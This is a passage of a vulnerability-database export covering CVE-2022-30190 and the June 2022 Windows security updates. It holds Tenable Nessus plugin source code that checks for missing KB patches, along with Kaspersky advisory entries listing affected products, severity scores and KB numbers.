script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014702'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:14393,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014702])\n)\n{\n 
replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-13T18:50:10", "description": "The remote Windows host is missing security update 5014692. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139, CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014692: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30131", "CVE-2022-30132", "CVE-2022-30136", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", "CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30190"], "modified": "2023-01-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014692.NASL", "href": "https://www.tenable.com/plugins/nessus/162197", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162197);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/13\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30131\",\n \"CVE-2022-30132\",\n \"CVE-2022-30136\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30148\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30154\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30190\"\n );\n script_xref(name:\"MSKB\", value:\"5014692\");\n 
script_xref(name:\"MSFT\", value:\"MS22-5014692\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014692: Windows 10 version 1809 / Windows Server 2019 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014692. It is, therefore, affected by multiple vulnerabilities\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-30136)\n\n - Windows Kerberos Elevation of Privilege Vulnerability (CVE-2022-30165)\n\n - Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability (CVE-2022-30139,\n CVE-2022-30141, CVE-2022-30143, CVE-2022-30146, CVE-2022-30149, CVE-2022-30153, CVE-2022-30161)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014692\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014692\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30136\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", 
value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014692'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:17763,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014692])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-16T17:48:50", "description": "The remote Windows host is missing security update 5014699. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-30166, CVE-2022-30165, CVE-2022-30160 CVE-2022-30154, CVE-2022-30151, CVE-2022-30150, CVE-2022-30147, CVE-2022-30132, CVE-2022-30131)\n\n - A security feature bypass vulnerability exists. 
An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2022-30164) \n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-30163, CVE-2022-30161, CVE-2022-30153, CVE-2022-30149, CVE-2022-30146, CVE-2022-30145, CVE-2022-30143, CVE-2022-30142, CVE-2022-30141, CVE-2022-30140, CVE-2022-30139,CVE-2022-30190)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T00:00:00", "type": "nessus", "title": "KB5014699: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (June 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21123", "CVE-2022-21125", "CVE-2022-21127", "CVE-2022-21166", "CVE-2022-30131", "CVE-2022-30132", "CVE-2022-30139", "CVE-2022-30140", "CVE-2022-30141", "CVE-2022-30142", "CVE-2022-30143", "CVE-2022-30145", "CVE-2022-30146", "CVE-2022-30147", "CVE-2022-30148", "CVE-2022-30149", "CVE-2022-30150", "CVE-2022-30151", "CVE-2022-30152", "CVE-2022-30153", "CVE-2022-30154", 
"CVE-2022-30155", "CVE-2022-30160", "CVE-2022-30161", "CVE-2022-30162", "CVE-2022-30163", "CVE-2022-30164", "CVE-2022-30165", "CVE-2022-30166", "CVE-2022-30189", "CVE-2022-30190", "CVE-2022-32230"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUN_5014699.NASL", "href": "https://www.tenable.com/plugins/nessus/162201", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162201);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21123\",\n \"CVE-2022-21125\",\n \"CVE-2022-21127\",\n \"CVE-2022-21166\",\n \"CVE-2022-30132\",\n \"CVE-2022-30139\",\n \"CVE-2022-30140\",\n \"CVE-2022-30141\",\n \"CVE-2022-30142\",\n \"CVE-2022-30143\",\n \"CVE-2022-30145\",\n \"CVE-2022-30146\",\n \"CVE-2022-30147\",\n \"CVE-2022-30148\",\n \"CVE-2022-30149\",\n \"CVE-2022-30150\",\n \"CVE-2022-30151\",\n \"CVE-2022-30152\",\n \"CVE-2022-30153\",\n \"CVE-2022-30155\",\n \"CVE-2022-30160\",\n \"CVE-2022-30161\",\n \"CVE-2022-30162\",\n \"CVE-2022-30163\",\n \"CVE-2022-30164\",\n \"CVE-2022-30165\",\n \"CVE-2022-30166\",\n \"CVE-2022-30189\",\n \"CVE-2022-30190\",\n \"CVE-2022-32230\"\n );\n script_xref(name:\"MSKB\", value:\"5014699\");\n script_xref(name:\"MSFT\", value:\"MS22-5014699\");\n script_xref(name:\"IAVA\", value:\"2022-A-0240-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0241-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/05\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0022\");\n\n script_name(english:\"KB5014699: Windows 10 Version 20H2 / 21H1 / 21H2 Security Update (June 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by 
multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014699. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. \n (CVE-2022-30166, CVE-2022-30165, CVE-2022-30160 CVE-2022-30154, CVE-2022-30151, CVE-2022-30150, \n CVE-2022-30147, CVE-2022-30132, CVE-2022-30131)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature \n and perform unauthorized actions compromising the integrity of the system/application. (CVE-2022-30164)\n \n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute \n unauthorized arbitrary commands. (CVE-2022-30163, CVE-2022-30161, CVE-2022-30153, CVE-2022-30149,\n CVE-2022-30146, CVE-2022-30145, CVE-2022-30143, CVE-2022-30142, CVE-2022-30141, CVE-2022-30140,\n CVE-2022-30139,CVE-2022-30190)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014699\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014699\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-30190\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30165\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n 
script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word MSDTJS');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-06';\nkbs = make_list(\n '5014699'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nos_name = get_kb_item(\"SMB/ProductName\");\n\nif (\n ( (\"enterprise\" >< tolower(os_name) || \"education\" >< tolower(os_name))\n &&\n smb_check_rollup(os:'10',\n os_build:19042,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014699]) )\n ||\n smb_check_rollup(os:'10',\n os_build:19043,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014699])\n || \n smb_check_rollup(os:'10',\n os_build:19044,\n rollup_date:'06_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014699])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-06-15T11:57:17", "description": "### *Detect date*:\n05/30/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in 
Microsoft Products (Extended Security Update). Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nMicrosoft Windows Support Diagnostic Tool (MSDT)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5014742](<http://support.microsoft.com/kb/5014742>) \n[5014748](<http://support.microsoft.com/kb/5014748>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T00:00:00", "type": "kaspersky", "title": 
"KLA12550 RCE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T00:00:00", "id": "KLA12550", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12550/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T11:57:17", "description": "### *Detect date*:\n05/30/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1809 for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2016 \nWindows Server 2019 \nWindows 10 Version 21H2 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2022 \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server 2022 Azure Edition Core Hotpatch \nMicrosoft Windows Support Diagnostic Tool (MSDT)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB 
list*:\n[5014702](<http://support.microsoft.com/kb/5014702>) \n[5014699](<http://support.microsoft.com/kb/5014699>) \n[5014692](<http://support.microsoft.com/kb/5014692>) \n[5014710](<http://support.microsoft.com/kb/5014710>) \n[5014747](<http://support.microsoft.com/kb/5014747>) \n[5014678](<http://support.microsoft.com/kb/5014678>) \n[5014738](<http://support.microsoft.com/kb/5014738>) \n[5014741](<http://support.microsoft.com/kb/5014741>) \n[5014697](<http://support.microsoft.com/kb/5014697>) \n[5014746](<http://support.microsoft.com/kb/5014746>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T00:00:00", "type": "kaspersky", "title": "KLA12549 RCE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T00:00:00", "id": "KLA12549", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12549/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-11T08:18:35", "description": "### *Detect date*:\n08/09/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple 
vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges, execute arbitrary code, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-35759](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35759>) \n[CVE-2022-34690](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34690>) \n[CVE-2022-35745](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35745>) \n[CVE-2022-35750](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35750>) \n[CVE-2022-34708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34708>) \n[CVE-2022-35753](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35753>) \n[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) \n[CVE-2022-35751](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35751>) \n[CVE-2022-34701](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34701>) 
